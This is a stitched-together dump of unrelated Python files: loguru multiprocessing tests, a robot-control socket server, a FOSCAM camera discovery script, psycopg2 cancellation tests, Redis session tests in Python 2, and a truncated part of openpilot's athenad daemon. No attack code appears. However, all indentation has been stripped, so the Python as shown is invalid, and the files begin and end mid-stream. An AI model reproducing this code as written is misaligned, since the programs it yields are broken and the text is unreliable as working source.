process.join()
assert process.exitcode == 0
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_main_process_inheritance():
writer = Writer()
barrier = multiprocessing.Barrier(2)
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_barrier_inheritance, args=(barrier,))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
process.join()
assert process.exitcode == 0
assert writer.read() == "Child\nMain\n"
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_await_complete_spawn(capsys, monkeypatch, loop_is_none):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
async def writer(msg):
print(msg, end="")
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
loop = None if loop_is_none else new_loop
logger.add(writer, format="{message}", loop=loop, enqueue=True, catch=False)
process = ctx.Process(target=subworker_complete, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
async def local():
await logger.complete()
new_loop.run_until_complete(local())
out, err = capsys.readouterr()
assert out == "Child\n"
assert err == ""
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_await_complete_fork(capsys, loop_is_none):
async def writer(msg):
print(msg, end="")
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
loop = None if loop_is_none else new_loop
logger.add(writer, format="{message}", loop=loop, enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_complete, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
async def local():
await logger.complete()
new_loop.run_until_complete(local())
out, err = capsys.readouterr()
assert out == "Child\n"
assert err == ""
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_await_complete_inheritance(capsys, loop_is_none):
async def writer(msg):
print(msg, end="")
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
loop = None if loop_is_none else new_loop
logger.add(writer, format="{message}", loop=loop, enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_complete_inheritance)
process.start()
process.join()
assert process.exitcode == 0
async def local():
await logger.complete()
new_loop.run_until_complete(local())
out, err = capsys.readouterr()
assert out == "Child\n"
assert err == ""
def test_not_picklable_sinks_spawn(monkeypatch, tmpdir, capsys):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True, catch=False)
logger.add(stream, format="{message}", enqueue=True)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True)
process = ctx.Process(target=subworker, args=[logger])
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_not_picklable_sinks_fork(capsys, tmpdir):
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True, catch=False)
logger.add(stream, format="{message}", enqueue=True, catch=False)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker, args=[logger])
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_not_picklable_sinks_inheritance(capsys, tmpdir):
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True, catch=False)
logger.add(stream, format="{message}", enqueue=True, catch=False)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_inheritance)
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.skipif(sys.version_info < (3, 7), reason="No 'os.register_at_fork()' function")
@pytest.mark.parametrize("enqueue", [True, False])
@pytest.mark.parametrize("deepcopied", [True, False])
def test_no_deadlock_if_internal_lock_in_use(tmpdir, enqueue, deepcopied):
if deepcopied:
logger_ = copy.deepcopy(logger)
else:
logger_ = logger
output = tmpdir.join("stdout.txt")
stdout = output.open("w")
def slow_sink(msg):
time.sleep(0.5)
stdout.write(msg)
stdout.flush()
def main():
logger_.info("Main")
def worker():
logger_.info("Child")
logger_.add(slow_sink, format="{message}", enqueue=enqueue, catch=False)
thread = threading.Thread(target=main)
thread.start()
process = multiprocessing.Process(target=worker)
process.start()
thread.join()
process.join(1)
assert process.exitcode == 0
logger_.remove()
assert output.read() in ("Main\nChild\n", "Child\nMain\n")
@pytest.mark.skipif(sys.version_info < (3, 7), reason="No 'os.register_at_fork()' function")
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.parametrize("enqueue", [True, False])
def test_no_deadlock_if_external_lock_in_use(enqueue, capsys):
    # Can't reproduce the bug under pytest (even if stderr is not wrapped), but run the test anyway
logger.add(sys.stderr, enqueue=enqueue, catch=True, format="{message}")
num = 100
for i in range(num):
logger.info("This is a message: {}", i)
process = multiprocessing.Process(target=lambda: None)
process.start()
process.join(1)
assert process.exitcode == 0
logger.remove()
out, err = capsys.readouterr()
assert out == ""
assert err == "".join("This is a message: %d\n" % i for i in range(num))
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.skipif(platform.python_implementation() == "PyPy", reason="PyPy is too slow")
def test_complete_from_multiple_child_processes(capsys):
logger.add(lambda _: None, enqueue=True, catch=False)
num = 100
barrier = multiprocessing.Barrier(num)
def worker(barrier):
barrier.wait()
logger.complete()
processes = []
for _ in range(num):
process = multiprocessing.Process(target=worker, args=(barrier,))
process.start()
processes.append(process)
for process in processes:
process.join(5)
assert process.exitcode == 0
out, err = capsys.readouterr()
assert out == err == ""
|
server.py
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Vladimir Collak
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
"""
Main server that receives commands from the controller and passes them to
the robot. Both the controller and the robot connect to this server.
Protocol Payload:
client_type = "controller" | "robot"
packet_type = "setup" | "normal"
command = "forward" | "backward" | "left" | "right" | "stop"
"""
import queue
import json
import logging
from settings import settings
def client_thread(conn, ip, port, MAX_BUFFER_SIZE=4096):
""" main thread that is spun up for each client (robot or controller) that
connects """
def get_client_data():
""" Waits for and processes data from clients
:return input_from_client: String that the client sent
"""
# the input is in bytes, so decode it
input_from_client_bytes = conn.recv(MAX_BUFFER_SIZE)
# MAX_BUFFER_SIZE is how big the message can be
        # this tests whether it's sufficiently big
import sys
siz = sys.getsizeof(input_from_client_bytes)
if siz >= MAX_BUFFER_SIZE:
logging.warning("The length of input is probably too long: {}".format(siz))
# decode input and strip the end of line
input_from_client = input_from_client_bytes.decode("utf8").rstrip()
logging.debug("Received from client: {}".format(input_from_client))
#start adding data to the queue and respond OK to client
res = "ok"
vysl = res.encode("utf8") # encode the result string
conn.sendall(vysl) # send it to client
return input_from_client
def parse_client_data(input_from_client):
""" Parses the string received from client
:param input_from_client: A string we received from the client
"""
try:
input_from_client_object = json.loads(input_from_client)
        except Exception:
logging.warning("Incorrect protocol. Unable to parse JSON")
return
return input_from_client_object
def get_commands():
"""
Waits to get data from the client, parses the data and extracts
the commands.
:return command: string - the command that the client sent
:return client_type: string - the type of client (robot or controller)
:return packet_type: string - the type of packet (normal, hello)
:return app_id: string - the app ID used for security purposes
:return input_from_client: string - raw input from the client
"""
input_from_client = get_client_data()
input_from_client_object = parse_client_data(input_from_client)
try:
command = input_from_client_object['command']
client_type = input_from_client_object["client_type"]
packet_type = input_from_client_object["packet_type"]
app_id = input_from_client_object["app_id"]
        except Exception:
logging.warning("Incorrect protocol. Unable to extract commands")
return
return (command, client_type, packet_type, app_id, input_from_client)
def send_quit_to_client():
"""
        Final packet to tell the client the server is disconnecting
"""
logging.info('Client ' + ip + ':' + port + " sent quit.")
res = "ok"
vysl = res.encode("utf8") # encode the result string
conn.sendall(vysl) # send it to client
conn.close() # close connection
logging.info('Connection ' + ip + ':' + port + ' ended')
def robot_loop():
"""
        Loop that handles sending commands to the robot. Loop as long as
        there is no error causing us to disconnect.
"""
logging.info(ip + ":" + port + " - robot connected")
remain_in_loop = True
while remain_in_loop:
if q.qsize() > 0:
logging.debug("Queue size: {}".format(q.qsize()))
while not q.empty():
data_from_queue = q.get()
logging.debug("Sending from queue to robot: {}".format(data_from_queue))
vysl = data_from_queue.encode("utf8") # encode the result string
try:
conn.sendall(vysl) # send it to client
except BrokenPipeError:
logging.critical("Unable to send to robot client. Broken pipe.")
remain_in_loop = False
def controller_loop(command):
"""
        Loop that handles receiving commands from the controller. Loop until
        the controller asks to disconnect.
        :param command: string that represents a command received from the controller
"""
logging.info(ip + ":" + port + " - controller connected")
while command != "quit":
try:
#get commands from the client
                (command, client_type, packet_type, app_id, input_from_client) = get_commands()
            except Exception:
logging.error("Unable to parse commands")
return command
if command == "quit":
return command
#add to the queue
if packet_type != "hello":
q.put(input_from_client)
try:
#get commands from client
        (command, client_type, packet_type, app_id, input_from_client) = get_commands()
if app_id != settings.Settings.APP_ID.value:
logging.info("Wrong APP_ID. Unathorized client. Closing connection.")
send_quit_to_client()
return
#loop until clients exits or fail
if client_type == "robot":
robot_loop()
elif client_type == "controller":
command = controller_loop(command)
#either client can send "quit" to exit
if command == "quit":
send_quit_to_client()
logging.info("Exiting client {}:{}".format(ip,port))
except ConnectionResetError:
#TODO - need to handle this better. if the thread exists
#should re-start it
logging.error("Client {}:{} sent reset. Exiting...".format(ip, port))
    except Exception:
logging.error("Unable to parse client message. Closing connection.")
send_quit_to_client()
def start_server():
"""
Starts the socket server that listens on HOST and PORT. Will start a
client_thread each time there is a connection.
"""
import socket
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this is for easy starting/killing the app
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # no delay on TCP send
soc.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
logging.debug("Socket started")
try:
host = settings.Settings.HOST.value
port = settings.Settings.PORT.value
soc.bind((host, port))
logging.info("Server UP on {}:{}".format(host,port))
except socket.error as msg:
import sys
logging.critical('Socket bind failed. Critical Error : ' + str(sys.exc_info()))
logging.critical("Exiting...")
sys.exit()
#Start listening on socket
soc.listen(10)
logging.info("Socket now accepting connections...")
# for handling task in separate jobs we need threading
from threading import Thread
# this will make an infinite loop needed for
# not reseting server for every client
while True:
conn, addr = soc.accept()
ip, port = str(addr[0]), str(addr[1])
logging.debug('Accepting connection from ' + ip + ':' + port)
try:
Thread(target=client_thread, args=(conn, ip, port)).start()
        except Exception:
logging.error("Unable to create client_thread.")
import traceback
traceback.print_exc()
soc.close()
# set up logging
logging.basicConfig(level=settings.Settings.LOGGING_LEVEL.value)
#server will use this queue to gather commands
#from controllers and send to robots
q = queue.Queue()
start_server()
|
foscamdiscover.py
|
#!/usr/bin/env python
# Discovers FOSCAM cameras on the local network
#
# By SukkoPera <software@sukkology.net>
# October 2018
import struct
import socket
import threading
import logging
class DiscovererException (Exception):
pass
class Discoverer (object):
BIND_IP = "" # All addresses
PORT = 10000
DEFAULT_AUTODISCOVER_INTERVAL = 5 # sec
def __init__ (self):
self._logger = logging.getLogger ('Discoverer')
self._handlers = []
self._keepGoing = False
def registerHandler (self, h):
if h not in self._handlers and callable (h):
self._handlers.append (h)
def start (self, interval = DEFAULT_AUTODISCOVER_INTERVAL):
if not self._keepGoing:
self._autodiscoverTimer = threading.Thread (target = self._timerCallback, args = (interval, ), name = "Discovery Thread")
self._autodiscoverTimer.daemon = True
self._keepGoing = True
self._autodiscoverTimer.start ()
def stop (self):
self._keepGoing = False
self._autodiscoverTimer.join ()
def _timerCallback (self, interval):
while self._keepGoing:
s = self._trigger (interval)
self._waitForReplies (s)
def _waitForReplies (self, s):
timedout = False
while not timedout and self._keepGoing:
try:
reply, addr = s.recvfrom (1024)
# ~ print "Got %d byte(s) from %s:%u:" % (len (reply), addr[0], addr[1])
# ~ for i in Discoverer.hexdump (reply):
# ~ print (i)
try:
data = self._decodeReply (reply)
if data is not None:
devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled = data
for h in self._handlers:
h (devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled)
except DiscovererException as ex:
self._logger.error ("Cannot parse reply from %s: %s" % (addr[0], str (ex)))
except socket.error as ex:
# ~ print "Socket Error: %s" % str (ex)
timedout = True
def _trigger (self, timeout):
"""Sends the magic "trigger" packet, returning the socket to wait for
replies onto."""
s = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)
# ~ s.setsockopt (socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setsockopt (socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# User Datagram Protocol, Src Port: 10000, Dst Port: 10000
s.bind ((Discoverer.BIND_IP, Discoverer.PORT))
# Data, 27 bytes: 4d4f5f490000000000000000000000040000000400000000000001
body = "4d4f5f490000000000000000000000040000000400000000000006".decode ("hex")
s.sendto (body, ('<broadcast>', Discoverer.PORT))
s.settimeout (timeout)
return s
def _decodeReply (self, reply):
#print "Got %d byte(s):" % len (reply)
#for i in Discoverer.hexdump (reply):
# print (i)
header = reply[:23]
text = reply[23:]
# Header is little-endian
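        # layout: 4-byte magic ("MO_I"), 2-byte opcode, 9 pad bytes,
        # 4-byte payload length, 4 pad bytes (23 bytes total)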
proto, opcode, textlen = struct.unpack ("< 4s H 9x L 4x", header)
if proto != "MO_I":
raise DiscovererException ("Bad protocol")
elif opcode != 1:
# ~ raise DiscovererException ("Bad operation code")
# Not a discover reply, ignore
return None
elif len (text) != textlen:
raise DiscovererException ("Bad packet length")
else:
# We only know the meaning of the first 65 bytes
if textlen > 65:
self._logger.debug ("Reply is longer than expected, truncating")
text = text[:65]
# Text is big-endian (...)
devid, name, ip, mask, gw, dns, v1, v2, v3, v4, v5, v6, v7, v8, port, dhcpEnabled = struct.unpack ("> 12s 1x 21s 4s 4s 4s 4s 4x 8B H 1B", text)
# Do some postprocessing
name = name.rstrip ("\0")
# ~ mac = re.sub (r"(..)", r"\1:", devid)[:-1]
sysVer = "%u.%u.%u.%u" % (v1, v2, v3, v4)
appVer = "%u.%u.%u.%u" % (v5, v6, v7, v8)
ver = "%s_%s" % (sysVer, appVer)
ip = socket.inet_ntoa (ip)
mask = socket.inet_ntoa (mask)
gw = socket.inet_ntoa (gw)
dns = socket.inet_ntoa (dns)
dhcpEnabled = bool (dhcpEnabled)
return devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled
@staticmethod
def hexdump(byte_string, _len=16, base_addr=0, n=0, sep='-'):
"""https://codereview.stackexchange.com/questions/161616/python-hexdump-generator"""
FMT = '{} {} |{}|'
not_shown = [' ']
leader = (base_addr + n) % _len
next_n = n + _len - leader
while byte_string[n:]:
col0 = format(n + base_addr - leader, '08x')
col1 = not_shown * leader
col2 = ' ' * leader
leader = 0
for i in bytearray(byte_string[n:next_n]):
col1 += [format(i, '02x')]
col2 += chr(i) if 31 < i < 127 else '.'
trailer = _len - len(col1)
if trailer:
col1 += not_shown * trailer
col2 += ' ' * trailer
col1.insert(_len // 2, sep)
yield FMT.format(col0, ' '.join(col1), col2)
n = next_n
next_n += _len
if __name__ == "__main__":
import time
class Handler (object):
def __init__ (self):
self.cams = {}
def __call__ (self, devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled):
if devid not in self.cams:
print "Found %s (%s) at http://%s:%u" % (name, devid, ip, port)
self.cams[devid] = (devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled)
logging.basicConfig ()
d = Discoverer ()
d.registerHandler (Handler ())
d.start ()
time.sleep (1)
d.stop ()
|
test_cancel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# test_cancel.py - unit test for query cancellation
#
# Copyright (C) 2010-2019 Jan Urbański <wulczer@wulczer.org>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import time
import threading
import psycopg2
import psycopg2.extensions
from psycopg2 import extras
from .testconfig import dsn
import unittest
from .testutils import ConnectingTestCase, skip_before_postgres, slow
class CancelTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
cur = self.conn.cursor()
cur.execute('''
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)''')
self.conn.commit()
def test_empty_cancel(self):
self.conn.cancel()
@slow
@skip_before_postgres(8, 2)
def test_cancel(self):
errors = []
def neverending(conn):
cur = conn.cursor()
try:
self.assertRaises(psycopg2.extensions.QueryCanceledError,
cur.execute, "select pg_sleep(60)")
# make sure the connection still works
conn.rollback()
cur.execute("select 1")
self.assertEqual(cur.fetchall(), [(1, )])
except Exception as e:
errors.append(e)
raise
def canceller(conn):
cur = conn.cursor()
try:
conn.cancel()
except Exception as e:
errors.append(e)
raise
del cur
thread1 = threading.Thread(target=neverending, args=(self.conn, ))
# wait a bit to make sure that the other thread is already in
# pg_sleep -- ugly and racy, but the chances are ridiculously low
thread2 = threading.Timer(0.3, canceller, args=(self.conn, ))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
self.assertEqual(errors, [])
@slow
@skip_before_postgres(8, 2)
def test_async_cancel(self):
async_conn = psycopg2.connect(dsn, async_=True)
self.assertRaises(psycopg2.OperationalError, async_conn.cancel)
extras.wait_select(async_conn)
cur = async_conn.cursor()
cur.execute("select pg_sleep(10)")
time.sleep(1)
self.assertTrue(async_conn.isexecuting())
async_conn.cancel()
self.assertRaises(psycopg2.extensions.QueryCanceledError,
extras.wait_select, async_conn)
cur.execute("select 1")
extras.wait_select(async_conn)
self.assertEqual(cur.fetchall(), [(1, )])
def test_async_connection_cancel(self):
async_conn = psycopg2.connect(dsn, async_=True)
async_conn.close()
self.assertTrue(async_conn.closed)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
test.py
|
import unittest
import redis
import uuid
import threading
import time
from token_redis import *
class TestCh02(unittest.TestCase):
def setUp(self):
import redis
self.conn = redis.Redis(db=15)
def tearDown(self):
conn = self.conn
to_del = (
conn.keys('login:*') + conn.keys('recent:*') + conn.keys('viewed:*') +
conn.keys('cart:*') + conn.keys('cache:*') + conn.keys('delay:*') +
conn.keys('schedule:*') + conn.keys('inv:*'))
if to_del:
self.conn.delete(*to_del)
del self.conn
global QUIT, LIMIT
QUIT = False
LIMIT = 10000000
print
print
def test_login_cookies(self):
conn = self.conn
global LIMIT, QUIT
token = str(uuid.uuid4())
update_token(conn, token, 'username', 'itemX')
print "We just logged-in/updated token:", token
print "For user:", 'username'
print
print "What username do we get when we look-up that token?"
r = check_token(conn, token)
print r
print
self.assertTrue(r)
print "Let's drop the maximum number of cookies to 0 to clean them out"
print "We will start a thread to do the cleaning, while we stop it later"
LIMIT = 0
t = threading.Thread(target=clean_sessions, args=(conn,))
t.setDaemon(1) # to make sure it dies if we ctrl+C quit
t.start()
time.sleep(1)
QUIT = True
time.sleep(2)
if t.isAlive():
raise Exception("The clean sessions thread is still alive?!?")
s = conn.hlen('login:')
print "The current number of sessions still available is:", s
self.assertFalse(s)
    def test_shopping_cart_cookies(self):
conn = self.conn
global LIMIT, QUIT
token = str(uuid.uuid4())
print "We'll refresh our session..."
update_token(conn, token, 'username', 'itemX')
print "And add an item to the shopping cart"
add_to_cart(conn, token, "itemY", 3)
r = conn.hgetall('cart:' + token)
print "Our shopping cart currently has:", r
print
self.assertTrue(len(r) >= 1)
print "Let's clean out our sessions and carts"
LIMIT = 0
t = threading.Thread(target=clean_full_sessions, args=(conn,))
t.setDaemon(1) # to make sure it dies if we ctrl+C quit
t.start()
time.sleep(1)
QUIT = True
time.sleep(2)
if t.isAlive():
raise Exception("The clean sessions thread is still alive?!?")
r = conn.hgetall('cart:' + token)
print "Our shopping cart now contains:", r
self.assertFalse(r)
def test_cache_request(self):
conn = self.conn
token = str(uuid.uuid4())
def callback(request):
return "content for " + request
update_token(conn, token, 'username', 'itemX')
url = 'http://test.com/?item=itemX'
print "We are going to cache a simple request against", url
result = cache_request(conn, url, callback)
print "We got initial content:", repr(result)
print
self.assertTrue(result)
print "To test that we've cached the request, we'll pass a bad callback"
result2 = cache_request(conn, url, None)
print "We ended up getting the same response!", repr(result2)
        self.assertEqual(result, result2)
self.assertFalse(can_cache(conn, 'http://test.com/'))
self.assertFalse(can_cache(conn, 'http://test.com/?item=itemX&_=1234536'))
def test_cache_rows(self):
import pprint
conn = self.conn
global QUIT
print "First, let's schedule caching of itemX every 5 seconds"
schedule_row_cache(conn, 'itemX', 5)
print "Our schedule looks like:"
s = conn.zrange('schedule:', 0, -1, withscores=True)
pprint.pprint(s)
self.assertTrue(s)
print "We'll start a caching thread that will cache the data..."
t = threading.Thread(target=cache_rows, args=(conn,))
t.setDaemon(1)
t.start()
time.sleep(1)
print "Our cached data looks like:"
r = conn.get('inv:itemX')
print repr(r)
self.assertTrue(r)
print
print "We'll check again in 5 seconds..."
time.sleep(5)
print "Notice that the data has changed..."
r2 = conn.get('inv:itemX')
print repr(r2)
print
self.assertTrue(r2)
self.assertTrue(r != r2)
print "Let's force un-caching"
schedule_row_cache(conn, 'itemX', -1)
time.sleep(1)
r = conn.get('inv:itemX')
print "The cache was cleared?", not r
print
self.assertFalse(r)
QUIT = True
time.sleep(2)
if t.isAlive():
raise Exception("The database caching thread is still alive?!?")
    # We aren't going to bother testing that the top 10k requests are cached,
    # as we already covered that as part of the cached requests test.
if __name__ == '__main__':
unittest.main()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import version, get_version, get_git_remote, get_git_branch, get_git_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://api.retropilot.org:4040')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
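# 2**31 - 1, the largest 32-bit Unix timestamp; used below to mark a log as successfully uploaded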
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
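# the defaults apply to the last three fields: retry_count=0, current=False, progress=0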
cur_upload_items = {}
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_git_remote(),
"branch": get_git_branch(),
"commit": get_git_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
